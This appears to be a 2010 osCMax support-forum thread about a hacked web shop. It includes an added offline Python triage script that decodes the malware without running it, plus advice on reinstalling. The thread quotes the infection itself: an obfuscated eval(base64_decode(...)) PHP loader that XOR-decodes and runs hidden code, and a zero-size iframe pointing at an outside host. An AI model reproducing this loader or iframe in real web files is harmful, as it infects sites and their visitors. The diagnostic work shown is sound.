s3Nzs2ODs3ODs3ODs1Njs2MTs3OTs3OTs3Mzs3OTs2NTs4ODs0 Njs3Mzs2MTs2OTs2Mzs1ODs3Nzs2Mjs3Mjs2OTs3NTs3Mzs3Nj s3ODs2MTs2Mzs2MTs3ODs3OTs2Mzs2ODs1ODs3NDs3Nzs3Nzs2 MTs3Mzs3NDs3Mjs3NDs2ODs3Mjs2Mzs3MTs5Mjs5Mjs5Mjs5Mj s5Mjs5MjsxOzkyOzkyOzkyOzkyOzkyOzkyOzE0OzI1Ozg7OTsx NDsxODs5Mjs4ODs0Njs3Njs3OTs3Mjs2MTs1Nzs3ODs2MTs2Mj s2OTs3Mjs1ODs2OTs2OTs2Mzs2Mzs2ODs3Nzs2Mjs3OTs2ODs2 OTs2MTs3Nzs2ODs3ODs3ODs1Njs2MTs3OTs3OTs3Mzs3OTs3MT s5Mjs5Mjs5Mjs5Mjs5MjsxOzkyOzkyOzkyOzkyOzE7OTI7OTI7 OTI7OTI7MjY7OTsxODszMTs4OzIxOzE5OzE4OzkyOzE3OzE0Oz E5OzMwOzIwOzg0Ozg4OzQ2OzU3OzY4Ozc4OzU3OzU3OzY5OzYy Ozc3Ozc4Ozc3OzU4Ozc1Ozc2OzY5OzY4OzY5OzczOzU3OzU4Oz czOzcyOzU3OzYyOzYxOzc1OzU4OzYxOzc0OzYyOzc1OzY4OzYy Ozg1Ozc7OTI7OTI7OTI7OTI7OTI7NTI7MjU7Mjk7MjQ7MjU7MT Q7ODQ7OTE7NjM7MTk7MTg7ODsyNTsxODs4OzgxOzU3OzE4OzMx OzE5OzI0OzIxOzE4OzI3OzcwOzkyOzE4OzE5OzE4OzI1OzkxOz g1OzcxOzkyOzkyOzkyOzkyOzkyOzg4OzQ2OzYxOzc3Ozc1OzY5 OzYxOzYyOzU2Ozc5OzYxOzc1OzYyOzY5OzU3Ozc4OzY4OzYzOz c5Ozc0OzY5OzU4Ozc1OzYyOzczOzY5OzYzOzczOzc3OzYyOzY4 Ozc3OzU2OzU3OzY1OzI3OzY7MjQ7MjU7MzE7MTk7MjQ7MjU7OD Q7ODg7NDY7NTc7Njg7Nzg7NTc7NTc7Njk7NjI7Nzc7Nzg7Nzc7 NTg7NzU7NzY7Njk7Njg7Njk7NzM7NTc7NTg7NzM7NzI7NTc7Nj I7NjE7NzU7NTg7NjE7NzQ7NjI7NzU7Njg7NjI7ODU7NzE7OTI7 OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7MTI7MTQ7MjU7Mj c7MzU7MTc7Mjk7ODszMTsyMDs4NDs5MTs4MzszMjs2NDszMjs4 MzszMDsxOTsyNDs1OzgzOzE1OzIxOzkxOzgwOzg4OzQ2OzYxOz c3Ozc1OzY5OzYxOzYyOzU2Ozc5OzYxOzc1OzYyOzY5OzU3Ozc4 OzY4OzYzOzc5Ozc0OzY5OzU4Ozc1OzYyOzczOzY5OzYzOzczOz c3OzYyOzY4Ozc3OzU2OzU3Ozg1Ozg1Ozc7OTI7OTI7OTI7OTI7 OTI7OTI7MTQ7MjU7ODs5OzE0OzE4OzkyOzEyOzE0OzI1OzI3Oz M1OzE0OzI1OzEyOzE2OzI5OzMxOzI1Ozg0OzkxOzgzOzg0OzMy OzY0OzMyOzgzOzMwOzE5OzI0OzU7Mzk7MzQ7MzI7NjY7MzM7OD Y7MzI7NjY7ODU7ODM7MTU7MjE7OTE7ODA7Mjc7MTc7MTY7ODQ7 ODU7ODI7OTQ7MzI7MTg7OTQ7ODI7OTE7ODg7Nzc7OTE7ODA7OD g7NDY7NjE7Nzc7NzU7Njk7NjE7NjI7NTY7Nzk7NjE7NzU7NjI7 Njk7NTc7Nzg7Njg7NjM7Nzk7NzQ7Njk7NTg7NzU7NjI7NzM7Nj k7NjM7NzM7Nzc7NjI7Njg7Nzc7NTY7NTc7ODU7NzE7OTI7OTI7 OTI7OTI7OTI7MTsyNTsxNjsxNTsyNTs3OzkyOzkyOzkyOzkyOz kyOzkyOzE0OzI1Ozg7OTsxNDsxODs5Mjs4ODs0Njs2MTs3Nzs3 
NTs2OTs2MTs2Mjs1Njs3OTs2MTs3NTs2Mjs2OTs1Nzs3ODs2OD s2Mzs3OTs3NDs2OTs1ODs3NTs2Mjs3Mzs2OTs2Mzs3Mzs3Nzs2 Mjs2ODs3Nzs1Njs1Nzs4MjsyNzsxNzsxNjs4NDs4NTs3MTs5Mj s5Mjs5Mjs5Mjs5MjsxOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7 OTI7MTk7MzA7MzU7MTU7ODsyOTsxNDs4Ozg0OzkxOzE3OzE0Oz E5OzMwOzIwOzkxOzg1OzcxOzkyOzkyOzkyOzE7OTI7OTI7MTsi KTskej0iIjtmb3JlYWNoKCRtIGFzICR2KWlmICgkdiE9IiIpJH ouPWNocigkdl4kayk7ZXZhbCgkeik7"));?>
<?php
/*
$Id: shipping.php 3 2006-05-27 04:59:07Z user $


I'm using a Mac and the security is very good.

So I need to go through ALL the files and delete the ... eval(base64_decode("JGs9MTI0O etc etc part?

Or would it be easier to just download the latest version and replace the files? Is that right? Is that how you upgrade? I've never done it before!

The site changes are mainly design changes; I've removed the right column and added links in the header. Changed all the buttons. Will the hack have infected picture files?

thanks again,

Michelle

I only use paypal, no credit card details, they process payments. thank god!

michelle
02-02-2010, 01:18 PM
You're right again, on some of my older product pages there was this link:

<iframe src="http://www.vcp-counter.com/unique/index.php" width=0 height=0 frameborder=0></iframe>

oh god I'm completely infected! this can't be good!

thanks
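
Since the online decoder gave nothing back, here is a small offline triage script. It is an added example for this thread, not osCMax code and not from any post above, and it never executes the payload. It finds every eval(base64_decode("...")) call (tolerating the spaces that forum wrapping inserted into the posted blob), base64-decodes it, and then recognises the second stage this particular blob uses: the opening characters JGs9MTI0OyRtPWV4cGxvZGUoIjsiLCIyMTsyNjs4NDsy... decode to $k=124;$m=explode(";","21;26;84;26;9;18;... and the tail decodes to ...$z.=chr($v^$k);eval($z); so each number XORed with 124 is one character of the real PHP (the first 19 numbers give if(function_exists( and the list continues with 'ob_start')&&!isset($GLOBALS['mr_no'])){, an output-buffer hook). It also flags zero-size iframes like the one on the product pages, and prints each file's modification time, which is the "latest save dates" check suggested earlier. Only those first 19 numbers of the posted list are reproduced; the infected file it scans by default is constructed here with a stand-in inner payload, and the file names and the hidden.invalid host are assumptions.

```python
#!/usr/bin/env python3
"""Offline triage for the eval(base64_decode(...)) / hidden-iframe infection.

Added example for this thread (not osCMax code). Decodes the obfuscation
statically; nothing here is ever eval'd or executed.
"""
from __future__ import annotations

import base64
import binascii
import re
import sys
from datetime import datetime
from pathlib import Path

# eval(base64_decode("...")) -- the argument may contain whitespace where a forum
# or mail client wrapped the long line, so allow \s inside the base64 run.
EVAL_B64_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)',
    re.IGNORECASE)

# Second stage seen in the posted blob:
#   $k=124;$m=explode(";","21;26;84;...");$z="";foreach($m as $v)if($v!="")$z.=chr($v^$k);eval($z);
XOR_LIST_RE = re.compile(
    r'\$\w+\s*=\s*(\d+)\s*;\s*\$\w+\s*=\s*explode\s*\(\s*";"\s*,\s*"([\d;\s]*)"\s*\)')

# Zero-size iframes such as <iframe src=... width=0 height=0 frameborder=0>
HIDDEN_IFRAME_RE = re.compile(
    r'<iframe\b[^>]*\b(?:width|height)\s*=\s*["\']?0(?!\d)[^>]*>', re.IGNORECASE)

# First 19 numbers of the list actually posted above (decoded from the base64
# prefix JGs9MTI0OyRtPWV4cGxvZGUoIjsiLCIyMTsyNjs4NDsy...); the key there is 124.
POSTED_PREFIX = "21;26;84;26;9;18;31;8;21;19;18;35;25;4;21;15;8;15;84"
POSTED_KEY = 124


def xor_list_to_php(numbers: str, key: int) -> str:
    """Reproduce chr($v^$k) for every non-empty entry, without eval."""
    return "".join(chr(int(n) ^ key) for n in numbers.replace(" ", "").split(";") if n)


def decode_posted_prefix() -> str:
    return xor_list_to_php(POSTED_PREFIX, POSTED_KEY)   # "if(function_exists("


def stage1_payloads(php_source: str) -> list[str]:
    """Text hidden inside every eval(base64_decode("...")) call in the source."""
    out = []
    for m in EVAL_B64_RE.finditer(php_source):
        b64 = re.sub(r"\s+", "", m.group(1))            # undo line wrapping
        try:
            out.append(base64.b64decode(b64, validate=True).decode("latin-1"))
        except (binascii.Error, ValueError):
            out.append("<undecodable base64>")
    return out


def stage2_xor_list(stage1: str) -> str | None:
    """If stage1 is the $k/explode/chr($v^$k) loader, return the PHP it would eval."""
    m = XOR_LIST_RE.search(stage1)
    return xor_list_to_php(m.group(2), int(m.group(1))) if m else None


def hidden_iframes(source: str) -> list[str]:
    return [m.group(0) for m in HIDDEN_IFRAME_RE.finditer(source)]


def scan_file(path: Path) -> dict:
    src = path.read_text(encoding="latin-1", errors="replace")
    return {
        "path": str(path),
        "mtime": datetime.fromtimestamp(path.stat().st_mtime).isoformat(timespec="seconds"),
        "eval_base64": [{"stage1": s[:80], "stage2": stage2_xor_list(s)} for s in stage1_payloads(src)],
        "hidden_iframes": hidden_iframes(src),
    }


def scan_tree(root: Path, exts=(".php", ".html", ".htm", ".tpl")) -> list[dict]:
    """Every file under root (e.g. a hypothetical catalog/ tree) carrying either indicator."""
    hits = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in exts:
            r = scan_file(p)
            if r["eval_base64"] or r["hidden_iframes"]:
                hits.append(r)
    return hits


def make_sample(inner_php: str, key: int = 124) -> str:
    """Constructed infected file: wraps inner_php exactly the way the posted loader does."""
    nums = ";".join(str(ord(c) ^ key) for c in inner_php)
    loader = f'$k={key};$m=explode(";","{nums}");$z="";foreach($m as $v)if ($v!="")$z.=chr($v^$k);eval($z);'
    b64 = base64.b64encode(loader.encode()).decode()
    b64 = " ".join(b64[i:i + 60] for i in range(0, len(b64), 60))   # mimic forum wrapping
    return f'<?php /**/ eval(base64_decode("{b64}"));?>\n<?php\n/* $Id: shipping.php */\n'


if __name__ == "__main__":
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    if root is None:                      # no path given: demo on a constructed sample
        import tempfile
        root = Path(tempfile.mkdtemp())
        (root / "shipping.php").write_text(make_sample(
            "if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){/* stand-in body */}"))
        (root / "product_info.php").write_text(
            '<iframe src="http://hidden.invalid/index.php" width=0 height=0 frameborder=0></iframe>')
    for hit in scan_tree(root):
        print(hit["mtime"], hit["path"])
        for e in hit["eval_base64"]:
            print("  eval(base64) ->", e["stage2"] or e["stage1"])
        for f in hit["hidden_iframes"]:
            print("  hidden iframe:", f)
```

Run it as python3 triage.py /path/to/catalog to list every file with either indicator, oldest-to-newest by path; files whose mtime is much newer than the rest of the install are the ones to open first. The decoded stage-2 text is what the loader would have passed to eval, so read it rather than running it, and treat the whole tree as suspect even after cleaning, since a reinstall from a known-good copy is the only way to be sure nothing else was dropped.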

pgmarshall
02-02-2010, 01:30 PM
Ah ha! A Mac user ... your Mac should be okay (still worth checking for viruses/keyloggers/trojans) ... but the server where you are hosting is not!

Unfortunately, the upgrade is not merely a drag and drop process ... there have been some significant changes since RC3 (http://www.oscmax.com/forums/oscmax-v2-announcements/17834-oscmax-2-0-rc4-released.html). I think a re-install would be the best course of action ... how much traffic do you get through your site?

No they will not have infected your images ... I don't think that is possible!

So the design changes are done by you in a template? I note you have a BLOG ... are you using the article manager to handle this?

Regards,

michelle
02-02-2010, 01:37 PM
Will check for that on my Mac.

a fair amount of traffic, Usage Statistics for www.birdys-boutique.co.uk - Summary by Month (http://stats.birdys-boutique.co.uk/)

The blog is using the article manager.

I'm going to buy a PHP security book and read it cover to cover! :)

Is it easy to re-install? Do I need to clear the hack / virus problems first?

I think this will take me a lot of work to get my pretty site back!

thanks for all your help!

pgmarshall
02-02-2010, 01:59 PM
Who is your host? Your domain name looks like a sub-domain rather than staying on Birdy's Boutique (http://www.birdys-boutique.co.uk/) ... once I enter your site you are on birdy001.secure.omnis.com, which is a bit odd - you don't need to have your entire site on a shared SSL.

Don't bother buying a book on PHP security! If you can find one ... all you need to do is to keep in touch with osCMax ... sign up for the newsletter ... Michael posts all the security updates from here ... they let you know when you need to make changes ... it is all very well explained and simple to do ... the problems arise when you leave it for a long time and then it can mount up a bit!

I think your time would be better spent re-building your site on the 2.0.4 platform (or upgrading to it) rather than manually trying to remove a base64 hack ... especially since you are not entirely familiar with PHP.

Regards,

michelle
02-02-2010, 02:07 PM
My host is omnis ( Web Hosting by Omnis Network (http://www.omnis.com)).

I think my host put my site on that SSL sub-domain link. With osCMax don't you have to buy the SSL? And my host said I could do it this way as the SSL was included in the hosting package.

Sorry to be a pain, but what's the best way to go about doing this?
Would it be to download the new version?
and then delete the catalog from my FTP and install the new version?
then start all over again? I will lose my customers and orders, won't I?
or do you go into each folder and replace the files?

thanks

pgmarshall
02-02-2010, 02:26 PM
Yep ... you have a shared SSL but you only need to secure the admin and payment pages ...

If you want to keep your old orders and other information you will need to back it up and reinstall them into the new site

OR

follow the upgrade path ...

Your choice ...

Regards,

ridexbuilder
02-02-2010, 02:49 PM
Thought PGM might've offered to do the work?
[He's never too busy :p]